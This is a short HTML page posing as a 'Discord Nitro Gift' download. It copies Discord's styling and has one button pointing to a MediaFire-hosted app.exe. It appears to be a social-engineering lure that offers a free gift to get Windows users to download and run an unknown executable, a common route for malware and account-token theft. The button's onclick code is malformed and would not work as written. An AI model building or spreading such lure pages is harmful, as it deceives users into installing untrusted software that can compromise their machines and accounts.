<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Download Discord Nitro Gift</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            background-color: #36393f;
            color: white;
            text-align: center;
            padding: 50px;
        }
        .container {
            background-color: #2f3136;
            padding: 20px;
            border-radius: 10px;
            display: inline-block;
        }
        button {
            padding: 10px 20px;
            background-color: #7289da;
            color: white;
            border: none;
            border-radius: 5px;
            cursor: pointer;
        }
        button:hover {
            background-color: #677bc4;
        }
    </style>
</head>
<body>
    <div class="container">
        <h1>Download Discord Nitro Gift</h1>
        <p>Click the button below to download the Windows application.</p>
        <button onclick="https://download948.mediafire.com/3fhevp3q19hg1oOzdc4VpOt1AhLMheL9kThss99mysAPwbsIz7xmqYxfU-ny2zeHMOgI2dC5FyTooTfwwY3kwhW4DMJF2Dd__WE73EM5tALrKfUAb359B5j9U-4jdgS69xPnumsKC2ls3O9SH7BRiVHpmTzh8i3Hu2u2gIX4ra7ANJU/8f77n653t9gu0fb/app.exe'">Download Now</button>
    </div>
</body>
</html>
